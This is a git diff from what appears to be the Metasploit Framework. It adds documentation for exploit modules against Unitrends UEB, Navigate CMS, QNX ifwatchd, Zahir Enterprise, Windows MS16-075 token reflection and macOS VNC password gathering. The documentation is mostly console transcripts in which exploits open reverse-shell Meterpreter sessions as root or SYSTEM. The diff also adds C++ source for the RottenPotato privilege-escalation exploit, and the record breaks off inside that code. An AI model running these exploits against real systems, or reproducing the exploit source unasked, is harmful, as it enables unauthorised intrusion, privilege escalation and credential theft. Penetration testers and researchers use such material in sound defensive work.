-msf exploit(ueb9_api_storage) > set rhost 10.0.0.230 -rhost => 10.0.0.230 -msf exploit(ueb9_api_storage) > set lhost 10.0.0.141 -lhost => 10.0.0.141 -msf exploit(ueb9_api_storage) > exploit - -[*] Started reverse TCP handler on 10.0.0.141:4444 -[*] 10.0.0.230:443 - pwn'ng ueb 9.... -[*] Command Stager progress - 19.83% done (164/827 bytes) -[*] Command Stager progress - 39.30% done (325/827 bytes) -[*] Command Stager progress - 57.44% done (475/827 bytes) -[*] Command Stager progress - 75.45% done (624/827 bytes) -[*] Command Stager progress - 93.35% done (772/827 bytes) -[*] Command Stager progress - 110.88% done (917/827 bytes) -[*] Sending stage (826872 bytes) to 10.0.0.230 -[*] Command Stager progress - 126.72% done (1048/827 bytes) -[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400 - -meterpreter > getuid -Server username: uid=0, gid=0, euid=0, egid=0 -``` \ No newline at end of file diff --git a/documentation/modules/exploit/linux/http/ueb_api_rce.md b/documentation/modules/exploit/linux/http/ueb_api_rce.md new file mode 100644 index 0000000000..7ffdcbd305 --- /dev/null +++ b/documentation/modules/exploit/linux/http/ueb_api_rce.md @@ -0,0 +1,93 @@ +## Vulnerable Application + +This exploit leverages a sqli vulnerability for authentication bypass, +together with command injection for subsequent RCE. + +This exploit has two targets: + + 1. Unitrends UEB 9 http api/storage RCE for root privileges + 2. Unitrends UEB < 10.1.0 api/hosts RCE for user (apache) privileges + +## Verification Steps + + 1. ```use exploit/linux/http/ueb_api_rce``` + 2. ```set lhost [IP]``` + 3. ```set rhost [IP]``` + 4. ```set target [#]``` + 5. ```exploit``` + 6. A meterpreter session should have been opened successfully + +## Scenarios + +### UEB 9.2 on CentOS 6.5 Using api/storage (target 0) root exploit + +``` +msf5 > use exploit/linux/http/ueb_api_rce +msf5 exploit(linux/http/ueb_api_rce) > set target 0 +target => 0 +msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 +rhost => 1.1.1.1 +msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +msf5 exploit(linux/http/ueb_api_rce) > exploit + +[*] Started reverse TCP handler on 2.2.2.2:4444 +[*] 1.1.1.1:443 - Sending requests to UEB... +[*] Command Stager progress - 19.76% done (164/830 bytes) +[*] Command Stager progress - 39.16% done (325/830 bytes) +[*] Command Stager progress - 56.87% done (472/830 bytes) +[*] Command Stager progress - 74.82% done (621/830 bytes) +[*] Command Stager progress - 92.77% done (770/830 bytes) +[*] Command Stager progress - 110.48% done (917/830 bytes) +[*] Sending stage (861480 bytes) to 1.1.1.1 +[*] Command Stager progress - 126.63% done (1051/830 bytes) +[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43600) at 2018-09-10 20:51:16 -0400 + +meterpreter > sysinfo +Computer : 1.1.1.1 +OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64) +Architecture : x64 +BuildTuple : i486-linux-musl +Meterpreter : x86/linux +meterpreter > getuid +Server username: uid=0, gid=0, euid=0, egid=0 +``` + +### UEB 9.2 on CentOS 6.5 Using api/hosts (target 1) exploit + +``` +msf5 > use exploit/linux/http/ueb_api_rce +msf5 exploit(linux/http/ueb_api_rce) > set target 1 +target => 1 +msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 +rhost => 1.1.1.1 +msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +msf5 exploit(linux/http/ueb_api_rce) > exploit + +[*] Started reverse TCP handler on 2.2.2.2:4444 +[*] 1.1.1.1:443 - Sending requests to UEB... +[*] Command Stager progress - 19.76% done (164/830 bytes) +[*] Command Stager progress - 39.16% done (325/830 bytes) +[*] Command Stager progress - 56.87% done (472/830 bytes) +[*] Command Stager progress - 74.82% done (621/830 bytes) +[*] Command Stager progress - 92.77% done (770/830 bytes) +[*] Command Stager progress - 110.48% done (917/830 bytes) +[*] Sending stage (861480 bytes) to 1.1.1.1 +[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43515) at 2018-09-10 20:46:24 -0400 +[*] Command Stager progress - 126.63% done (1051/830 bytes) + +meterpreter > sysinfo +Computer : 1.1.1.1 +OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64) +Architecture : x64 +BuildTuple : i486-linux-musl +Meterpreter : x86/linux +meterpreter > getuid +Server username: uid=48, gid=48, euid=48, egid=48 +meterpreter > shell +Process 25534 created. +Channel 1 created. +whoami +apache +``` diff --git a/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md b/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md index 2b18a1c51c..8532e6281d 100644 --- a/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md +++ b/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md @@ -7,7 +7,7 @@ ## Vulnerable Application - The `lastore-daemon` D-Bus configuration on Deepin Linux 15.5 permits any + The `lastore-daemon` D-Bus configuration on Deepin Linux permits any user in the `sudo` group to install arbitrary system packages without providing a password, resulting in code execution as root. By default, the first user created on the system is a member of the `sudo` group. @@ -30,8 +30,10 @@ ``` - This module has been tested successfully with lastore-daemon version - 0.9.53-1 on Deepin Linux 15.5 (x64). + This module has been tested successfully with lastore-daemon versions: + + * 0.9.53-1 on Deepin Linux 15.5 (x64) + * 0.9.66-1 on Deepin Linux 15.7 (x64) Deepin Linux is available here: diff --git a/documentation/modules/exploit/multi/http/navigate_cms_rce.md b/documentation/modules/exploit/multi/http/navigate_cms_rce.md new file mode 100644 index 0000000000..0bfd6748fc --- /dev/null +++ b/documentation/modules/exploit/multi/http/navigate_cms_rce.md @@ -0,0 +1,44 @@ +## Description + +This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication. +It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. +Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely. + +This module was tested against Navigate CMS 2.8. + +## Vulnerable Application + +[Navigate CMS 2.8](https://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8r1302.zip) + +## Verification Steps + +1. Install Navigate CMS +2. Start `msfconsole` +3. `use exploit/multi/http/navigate_cms_rce` +4. `set RHOST ` +5. `check` +6. You should see `The target appears to be vulnerable.` +7. `exploit` +8. You should get a meterpreter session + +## Scenarios + +### Navigate CMS on Ubuntu 18.04 + +``` +msf5 > use exploit/multi/http/navigate_cms_rce +msf5 exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45 +RHOST => 192.168.178.45 +msf5 exploit(multi/http/navigate_cms_rce) > check +[*] 192.168.178.45:80 The target appears to be vulnerable. +msf5 exploit(multi/http/navigate_cms_rce) > exploit + +[*] Started reverse TCP handler on 192.168.178.35:4444 +[+] Login bypass successful +[+] Upload successful +[*] Triggering payload... +[*] Sending stage (37775 bytes) to 192.168.178.45 +[*] Meterpreter session 1 opened (192.168.178.35:4444 -> 192.168.178.45:52720) at 2018-09-26 22:24:59 +0200 + +meterpreter > +``` diff --git a/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md b/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md index 6c2bbd2321..d5a0823794 100644 --- a/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md +++ b/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md @@ -1,6 +1,10 @@ ## Vulnerable Application This vulnerability expoits mysql by adding a .so or .dll file which has a system call in it to the plugins folder. +The Windows dll files are provided by [@stamparm](https://github.com/stamparm) of the sqlmap project and are +located [here](https://github.com/rapid7/metasploit-framework/files/1879611/mysql_udf_libs.zip). As noted +in [#9677](https://github.com/rapid7/metasploit-framework/issues/9677#issuecomment-378893925) these are 'de-cloaked' versions, +which may attract AV attention. The file is then loaded by mysql, and arbitrary commands can be run. There are several caveats for this to function however, including: 1. `secure_file_priv`, a mysql setting, must be changed from the default to allow writing diff --git a/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md b/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md new file mode 100644 index 0000000000..6fc9e281cd --- /dev/null +++ b/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md @@ -0,0 +1,64 @@ +## Description + + This module attempts to gain root privileges on QNX 6.4.x and 6.5.x + systems by exploiting the `ifwatchd` suid executable. + + +## Vulnerable Application + + `ifwatchd` allows users to specify scripts to execute using the `-A` + command line argument; however, it does not drop privileges when + executing user-supplied scripts, resulting in execution of arbitrary + commands as root. + + This module has been tested successfully on: + + * QNX Neutrino 6.5.0 (x86) + * QNX Neutrino 6.5.0 SP1 (x86) + + QNX Neutrino 6.5.0 Service Pack 1 is available here: + + * http://www.qnx.com/download/feature.html?programid=23665 + + +## Verification Steps + + 1. Start `msfconsole` + 2. `use exploit/qnx/local/ifwatchd_priv_esc` + 3. `set session ` + 4. `run` + 5. You should get a *root* session + + +## Options + + **SESSION** + + Which session to use, which can be viewed with `sessions` + + **WritableDir** + + A writable directory file system path. (default: `/tmp`) + + +## Scenarios + + ``` + msf5 > use exploit/qnx/local/ifwatchd_priv_esc + msf5 exploit(qnx/local/ifwatchd_priv_esc) > set session 1 + session => 1 + msf5 exploit(qnx/local/ifwatchd_priv_esc) > set lhost 172.16.191.188 + lhost => 172.16.191.188 + msf5 exploit(qnx/local/ifwatchd_priv_esc) > run + + [*] Started reverse TCP handler on 172.16.191.188:4444 + [*] Writing interface arrival event script... + [*] Executing /sbin/ifwatchd... + [*] Command shell session 2 opened (172.16.191.188:4444 -> 172.16.191.215:65500) at 2018-03-22 15:18:48 -0400 + + id + uid=100(test) gid=100 euid=0(root) + uname -a + QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86 + ``` + diff --git a/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md b/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md new file mode 100644 index 0000000000..9673672ae2 --- /dev/null +++ b/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md @@ -0,0 +1,41 @@ +## Description + +Zahir Accounting Enterprise 6 through build 10.b contains a buffer overflow vulnerability in its Import file functionality, which can be triggered with a crafted CSV file. + +## Vulnerable Application + +[Zahir Enterprise 6](http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip) through build 10.b + +[Update to build 10b](http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip) + +## Verification Steps + +1. `./msfconsole -q` +2. `use exploit/windows/fileformat/zahir_enterprise_plus_csv` +3. `run` +4. `handler -p -H -P ` +5. From Zahir Application. File -> Import -> Import from File -> Select option -> Specify msf generated file -> Click through to Process +6. Get a session + +## Scenarios + +### Zahir Enterprise 6 build 10b on Windows 10 x64 + +``` +msf5 exploit(windows/fileformat/zahir_enterprise_plus_csv) > +[*] Started reverse TCP handler on 172.22.222.130:4444 +[*] Sending stage (179779 bytes) to 172.22.222.200 +[*] Meterpreter session 4 opened (172.22.222.130:4444 -> 172.22.222.200:49934) at 2018-10-04 10:09:01 -0500 +sessions -i 4 +[*] Starting interaction with 4... + +meterpreter > sysinfo +Computer : DESKTOP-IPOGIJR +OS : Windows 10 (Build 17134). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/windows +meterpreter > +``` diff --git a/documentation/modules/exploit/windows/local/ms16_075_reflection.md b/documentation/modules/exploit/windows/local/ms16_075_reflection.md new file mode 100644 index 0000000000..a726d11e6d --- /dev/null +++ b/documentation/modules/exploit/windows/local/ms16_075_reflection.md @@ -0,0 +1,65 @@ +## Intro + This module will abuse the SeImperonsate privilege commonly found in +services due to the requirement to impersonate a client upon +authentication. As such it is possible to impersonate the SYSTEM account +and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM +attack at which intercepts the hash and relay responses from RPC to be +able to establish a handle to a new SYSTEM token. Some caveats : Set +your target option to match the architecture of your Meterpreter +session, else it will inject the wrong architecture DLL into the process +of a seperate architecture. Additionally, after you have established a +session, you must use incognito to imperonsate the SYSTEM Token. + +## Build Instructions +This builds using visual studio 2017 and tools v141. Attempts +to compile with previous verstions of build tools will succeed but +the resulting binary fails to exploit the vulnerability. + +## Usage + You'll first need to obtain a session on the target system. + Next, once the module is loaded, one simply needs to set the +```payload``` and ```session``` options, in addition to architecture. + + Your user at which you are trying to exploit must have `SeImpersonate` +privileges. + + The module has a hardcoded timeout of 20 seconds, as the attack may +not work immediately and take a few seconds to start. Also, check to +make sure port 6666 is inherently not in use else the exploit will not +run properly + +## Scenario +``` + Name Current Setting Required Description + ---- --------------- -------- ----------- + SESSION 48 yes The session to run this module on. Payload options +(windows/x64/meterpreter/reverse_tcp): + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, +process, none) + LHOST ens3 yes The listen address (an interface may be specified) + LPORT 3312 yes The listen port Exploit target: + Id Name + -- ---- + 1 Windows x64 msf exploit(windows/local/ms16_075_reflection) > run +[*] Started reverse TCP handler on -snip-:3312 +[*] Launching notepad to host the exploit... [+] Process 3564 launched. +[*] Reflectively injecting the exploit DLL into 3564... +[*] Injecting exploit into 3564... +[*] Exploit injected. Injecting payload into 3564... +[*] Payload injected. Executing exploit.. +[+] Exploit finished, wait for (hopefully privileged) payload execution to complete. +[*] Sending stage (206403 bytes) to -snip- +[*] Meterpreter session 49 opened (-snip-:3312 -> -snip-:55306) at 2018-08-03 01:54:18 -0400 +meterpreter > load incognito +Loading extension incognito...Success. +meterpreter > impersonate_token +'NT AUTHORITY\SYSTEM' +[-] Warning: Not currently running as SYSTEM, not all tokens will be available + Call rev2self if primary process token is SYSTEM +[-] No delegation token available +[+] Successfully impersonated user NT AUTHORITY\SYSTEM +meterpreter > getsystem -t 1 ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). +meterpreter > +``` diff --git a/documentation/modules/exploit/windows/local/ms16_reflection.md b/documentation/modules/exploit/windows/local/ms16_reflection.md new file mode 100644 index 0000000000..2f93932baf --- /dev/null +++ b/documentation/modules/exploit/windows/local/ms16_reflection.md @@ -0,0 +1,55 @@ +## Intro + This module will abuse the SeImperonsate privilege commonly found in +services due to the requirement to impersonate a client upon +authentication. As such it is possible to impersonate the SYSTEM account +and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM +attack at which intercepts the hash and relay responses from RPC to be +able to establish a handle to a new SYSTEM token. Some caveats : Set +your target option to match the architecture of your Meterpreter +session, else it will inject the wrong architecture DLL into the process +of a seperate architecture. Additionally, after you have established a +session, you must use incognito to imperonsate the SYSTEM Token. +## Usage + You'll first need to obtain a session on the target system. + Next, once the module is loaded, one simply needs to set the +```payload``` and ```session``` options, in addition to architecture. + + Your user at which you are trying to exploit must have `SeImpersonate` +privileges. + + The module has a hardcoded timeout of 20 seconds, as the attack may +not work immediately and take a few seconds to start. Also, check to +make sure port 6666 is inherently not in use else the exploit will not +run properly + +## Scenario +``` + Name Current Setting Required Description + ---- --------------- -------- ----------- + SESSION 48 yes The session to run this module on. Payload options +(windows/x64/meterpreter/reverse_tcp): + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, +process, none) + LHOST ens3 yes The listen address (an interface may be specified) + LPORT 3312 yes The listen port Exploit target: + Id Name + -- ---- + 1 Windows x64 msf exploit(windows/local/ms16_075_reflection) > run +[*] Started reverse TCP handler on -snip-:3312 [*] Launching notepad to +host the exploit... [+] Process 3564 launched. [*] Reflectively +injecting the exploit DLL into 3564... [*] Injecting exploit into +3564... [*] Exploit injected. Injecting payload into 3564... [*] Payload +injected. Executing exploit... [+] Exploit finished, wait for (hopefully +privileged) payload execution to complete. [*] Sending stage (206403 +bytes) to -snip- [*] Meterpreter session 49 opened (-snip-:3312 -> +-snip-:55306) at 2018-08-03 01:54:18 -0400 meterpreter > load incognito +Loading extension incognito...Success. meterpreter > impersonate_token +'NT AUTHORITY\SYSTEM' [-] Warning: Not currently running as SYSTEM, not +all tokens will be available + Call rev2self if primary process token is SYSTEM [-] No +delegation token available [+] Successfully impersonated user NT +AUTHORITY\SYSTEM meterpreter > getsystem -t 1 ...got system via +technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > +``` diff --git a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md index 1780ce84ce..bac6ce862d 100644 --- a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md +++ b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md @@ -30,7 +30,7 @@ Another way to use windows/meterpreter/reverse_tcp is to generate it as an execu you would want to do it with msfvenom. If you are old school, you have probably also heard of msfpayload and msfencode. msfvenom is a replacement of those. -The following is a basic example of using msfvenom to to generate windows/meterpreter/reverse_tcp +The following is a basic example of using msfvenom to generate windows/meterpreter/reverse_tcp as an executable: ``` @@ -261,7 +261,7 @@ meterpreter > getsystem **hashdump** The ```hashdump``` commands allows you to dump the Windows hashes if there are the right privileges. -For sxample: +For example: ``` meterpreter > hashdump diff --git a/documentation/modules/post/multi/gather/wlan_geolocate.md b/documentation/modules/post/multi/gather/wlan_geolocate.md index e8a9d33f26..6c4edae1c0 100644 --- a/documentation/modules/post/multi/gather/wlan_geolocate.md +++ b/documentation/modules/post/multi/gather/wlan_geolocate.md @@ -8,6 +8,7 @@ - Linux: `iwlist scanning` - Solaris: `dladm scan-wifi` - BSD: `dmesg | grep -i wlan | cut -d ':' -f1 | uniq"` + - Android: [WifiManager](https://developer.android.com/reference/android/net/wifi/WifiManager) If `GEOLOCATE` is set to true, Google's [GeoLocation APIs](https://developers.google.com/maps/documentation/geolocation/intro) are utilized. These APIs require a Google [API key](https://developers.google.com/maps/documentation/geolocation/get-api-key) to use them. The original diff --git a/documentation/modules/post/osx/gather/vnc_password_osx.md b/documentation/modules/post/osx/gather/vnc_password_osx.md new file mode 100644 index 0000000000..a63a18e679 --- /dev/null +++ b/documentation/modules/post/osx/gather/vnc_password_osx.md @@ -0,0 +1,38 @@ +This module shows Apple VNC Password from Mac OS X High Sierra. + +The password can be set by visiting: +System Preferences > Sharing > Screen Sharing > Computer Settings + +## Vulnerable Application + + * macOS 10.13.6 + + +## Verification Steps + + Example steps in this format (is also in the PR): + + 1. Start `msfconsole` + 2. Get an OSX meterpreter session running as root + 3. Do: `use post/osx/gather/vnc_password_osx` + 4. Do: `set SESSION [ID]` + 5. Do: `run` + 6. You should see the password + + +## Scenarios + + Typical run against an OSX session, with the vnc service activated: + +``` +msf5 exploit(multi/handler) > use post/osx/gather/vnc_password_osx +msf5 post(osx/gather/vnc_password_osx) > set SESSION 1 +SESSION => 1 +msf5 post(osx/gather/vnc_password_osx) > exploit + +[*] Checking VNC Password... +[+] Password Found: PoCpassw +[+] Password data stored as loot in: .msf4/loot/20181002142527_default_10.0.2.15_osx.vnc.password_371610.txt +[*] Post module execution completed +msf5 post(osx/gather/vnc_password_osx) > +``` diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato.sln b/external/source/exploits/rottenpotato/MSFRottenPotato.sln new file mode 100755 index 0000000000..56c5d0f2f8 --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato.sln @@ -0,0 +1,32 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 15 +VisualStudioVersion = 15.0.26403.7 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MSFRottenPotato", "MSFRottenPotato\MSFRottenPotato.vcxproj", "{4164003E-BA47-4A95-8586-D5AAC399C050}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {4164003E-BA47-4A95-8586-D5AAC399C050}.Debug|x64.ActiveCfg = Debug|x64 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Debug|x64.Build.0 = Debug|x64 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Debug|x86.ActiveCfg = Debug|Win32 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Debug|x86.Build.0 = Debug|Win32 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Release|x64.ActiveCfg = Release|x64 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Release|x64.Build.0 = Release|x64 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Release|x64.Deploy.0 = Release|x64 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Release|x86.ActiveCfg = Release|Win32 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {F17C3DED-70DC-4318-B6D7-1477B2D4D79D} + EndGlobalSection +EndGlobal diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/BlockingQueue.h b/external/source/exploits/rottenpotato/MSFRottenPotato/BlockingQueue.h new file mode 100755 index 0000000000..f4ce017977 --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/BlockingQueue.h @@ -0,0 +1,42 @@ +#pragma once +#include +#include +#include +#include "stdafx.h" + +typedef std::mutex Mutex; +template class BlockingQueue{ +public: + void push(const ITEM& value) { // push + std::lock_guard lock(mutex); + queue.push(std::move(value)); + condition.notify_one(); + } + bool try_pop(ITEM& value) { // non-blocking pop + std::lock_guard lock(mutex); + if (queue.empty()) return false; + value = std::move(queue.front()); + queue.pop(); + return true; + } + ITEM wait_pop() { // blocking pop + std::unique_lock lock(mutex); + condition.wait(lock, [this] {return !queue.empty(); }); + ITEM const value = std::move(queue.front()); + queue.pop(); + return value; + } + bool empty() const { // queue is empty? + std::lock_guard lock(mutex); + return queue.empty(); + } + void clear() { // remove all items + ITEM item; + while (try_pop(item)); + } +private: + Mutex mutex; + std::queue queue; + std::condition_variable condition; +}; + diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/IStorageTrigger.cpp b/external/source/exploits/rottenpotato/MSFRottenPotato/IStorageTrigger.cpp new file mode 100644 index 0000000000..06b9b7361b --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/IStorageTrigger.cpp @@ -0,0 +1,143 @@ +#include "stdafx.h" +#include "IStorageTrigger.h" +#include +#include + +IStorageTrigger::IStorageTrigger(IStorage *istg) { + _stg = istg; + m_cRef = 1; + return; +} + +HRESULT IStorageTrigger::DisconnectObject(DWORD dwReserved) { + return 0; +} +HRESULT IStorageTrigger::GetMarshalSizeMax(const IID &riid, void *pv, DWORD dwDestContext, void *pvDestContext, DWORD mshlflags, DWORD *pSize) { + *pSize = 1024; + return 0; +} +HRESULT IStorageTrigger::GetUnmarshalClass(const IID &riid, void *pv, DWORD dwDestContext, void *pvDestContext, DWORD mshlflags, CLSID *pCid) { + CLSIDFromString(OLESTR("{00000306-0000-0000-c000-000000000046}"), pCid); + return 0; +} +HRESULT IStorageTrigger::MarshalInterface(IStream *pStm, const IID &riid, void *pv, DWORD dwDestContext, void *pvDestContext, DWORD mshlflags) { + byte data[] = { 0x4D, 0x45, 0x4F, 0x57, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x94, 0x09, 0x34, 0x76, + 0xC0, 0xF0, 0x15, 0xD8, 0x19, 0x8F, 0x4A, 0xA2, 0xCE, 0x05, 0x60, 0x86, 0xA3, 0x2A, 0x0F, 0x09, 0x24, 0xE8, 0x70, + 0x2A, 0x85, 0x65, 0x3B, 0x33, 0x97, 0xAA, 0x9C, 0xEC, 0x16, 0x00, 0x12, 0x00, 0x07, 0x00, 0x31, 0x00, 0x32, 0x00, + 0x37, 0x00, 0x2E, 0x00, 0x30, 0x00, 0x2E, 0x00, 0x30, 0x00, 0x2E, 0x00, 0x31, 0x00, 0x5B, 0x00, 0x36, 0x00, 0x36, + 0x00, 0x36, 0x00, 0x36, 0x00, 0x5D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00 }; + ULONG written = 0; + int szData = sizeof(data); + pStm->Write(&data, sizeof(data), &written); + return 0; +} +HRESULT IStorageTrigger::ReleaseMarshalData(IStream *pStm) { + return 0; +} +HRESULT IStorageTrigger::UnmarshalInterface(IStream *pStm, const IID &riid, void **ppv) { + *ppv = 0; + return 0; +} +HRESULT IStorageTrigger::Commit(DWORD grfCommitFlags) { + _stg->Commit(grfCommitFlags); + return 0; +} +HRESULT IStorageTrigger::CopyTo(DWORD ciidExclude, const IID *rgiidExclude, SNB snbExclude, IStorage *pstgDest) { + _stg->CopyTo(ciidExclude, rgiidExclude, snbExclude, pstgDest); + return 0; +} +HRESULT IStorageTrigger::CreateStorage(const OLECHAR *pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStorage **ppstg) { + _stg->CreateStorage(pwcsName, grfMode, reserved1, reserved2, ppstg); + return 0; +} +HRESULT IStorageTrigger::CreateStream(const OLECHAR *pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStream **ppstm) { + _stg->CreateStream(pwcsName, grfMode, reserved1, reserved2, ppstm); + return 0; +} +HRESULT IStorageTrigger::DestroyElement(const OLECHAR *pwcsName) { + _stg->DestroyElement(pwcsName); + return 0; +} +HRESULT IStorageTrigger::EnumElements(DWORD reserved1, void *reserved2, DWORD reserved3, IEnumSTATSTG **ppenum) { + _stg->EnumElements(reserved1, reserved2, reserved3, ppenum); + return 0; +} +HRESULT IStorageTrigger::MoveElementTo(const OLECHAR *pwcsName, IStorage *pstgDest, const OLECHAR *pwcsNewName, DWORD grfFlags) { + _stg->MoveElementTo(pwcsName, pstgDest, pwcsNewName, grfFlags); + return 0; +} +HRESULT IStorageTrigger::OpenStorage(const OLECHAR *pwcsName, IStorage *pstgPriority, DWORD grfMode, SNB snbExclude, DWORD reserved, IStorage **ppstg) { + _stg->OpenStorage(pwcsName, pstgPriority, grfMode, snbExclude, reserved, ppstg); + return 0; +} +HRESULT IStorageTrigger::OpenStream(const OLECHAR *pwcsName, void *reserved1, DWORD grfMode, DWORD reserved2, IStream **ppstm) { + _stg->OpenStream(pwcsName, reserved1, grfMode, reserved2, ppstm); + return 0; +} +HRESULT IStorageTrigger::RenameElement(const OLECHAR *pwcsOldName, const OLECHAR *pwcsNewName) { + return 0; +} +HRESULT IStorageTrigger::Revert() { + return 0; +} +HRESULT IStorageTrigger::SetClass(const IID &clsid) { + return 0; +} +HRESULT IStorageTrigger::SetElementTimes(const OLECHAR *pwcsName, const FILETIME *pctime, const FILETIME *patime, const FILETIME *pmtime) { + return 0; +} +HRESULT IStorageTrigger::SetStateBits(DWORD grfStateBits, DWORD grfMask) { + return 0; +} +HRESULT IStorageTrigger::Stat(STATSTG *pstatstg, DWORD grfStatFlag) { + _stg->Stat(pstatstg, grfStatFlag); + + //Allocate from heap because apparently this will get freed in OLE32 + const wchar_t c_s[] = L"hello.stg"; + wchar_t *s = (wchar_t*)CoTaskMemAlloc(sizeof(c_s)); + wcscpy(s, c_s); + pstatstg[0].pwcsName = s; + return 0; +} + +///////////////////////IUknown Interface +HRESULT IStorageTrigger::QueryInterface(const IID &riid, void **ppvObj) { + // Always set out parameter to NULL, validating it first. + if (!ppvObj) + return E_INVALIDARG; + if (riid == IID_IUnknown) + { + *ppvObj = static_cast(this); + //reinterpret_cast(*ppvObj)->AddRef(); + } + else if (riid == IID_IStorage) + { + *ppvObj = static_cast(this); + } + else if (riid == IID_IMarshal) + { + *ppvObj = static_cast(this); + } + else + { + *ppvObj = NULL; + return E_NOINTERFACE; + } + // Increment the reference count and return the pointer. + + return S_OK; + +} + + +ULONG IStorageTrigger::AddRef() { + m_cRef++; + return m_cRef; +} + +ULONG IStorageTrigger::Release() { + // Decrement the object's internal counter. + ULONG ulRefCount = m_cRef--; + return ulRefCount; +} diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/IStorageTrigger.h b/external/source/exploits/rottenpotato/MSFRottenPotato/IStorageTrigger.h new file mode 100644 index 0000000000..bf38e5b1bf --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/IStorageTrigger.h @@ -0,0 +1,35 @@ +#pragma once +#include "Objidl.h" + +class IStorageTrigger : public IMarshal, public IStorage { +private: + IStorage *_stg; + int m_cRef; +public: + IStorageTrigger(IStorage *stg); + HRESULT STDMETHODCALLTYPE DisconnectObject(DWORD dwReserved); + HRESULT STDMETHODCALLTYPE GetMarshalSizeMax(const IID &riid, void *pv, DWORD dwDestContext, void *pvDestContext, DWORD mshlflags, DWORD *pSize); + HRESULT STDMETHODCALLTYPE GetUnmarshalClass(const IID &riid, void *pv, DWORD dwDestContext, void *pvDestContext, DWORD mshlflags, CLSID *pCid); + HRESULT STDMETHODCALLTYPE MarshalInterface(IStream *pStm, const IID &riid, void *pv, DWORD dwDestContext, void *pvDestContext, DWORD mshlflags); + HRESULT STDMETHODCALLTYPE ReleaseMarshalData(IStream *pStm); + HRESULT STDMETHODCALLTYPE UnmarshalInterface(IStream *pStm, const IID &riid, void **ppv); + HRESULT STDMETHODCALLTYPE Commit(DWORD 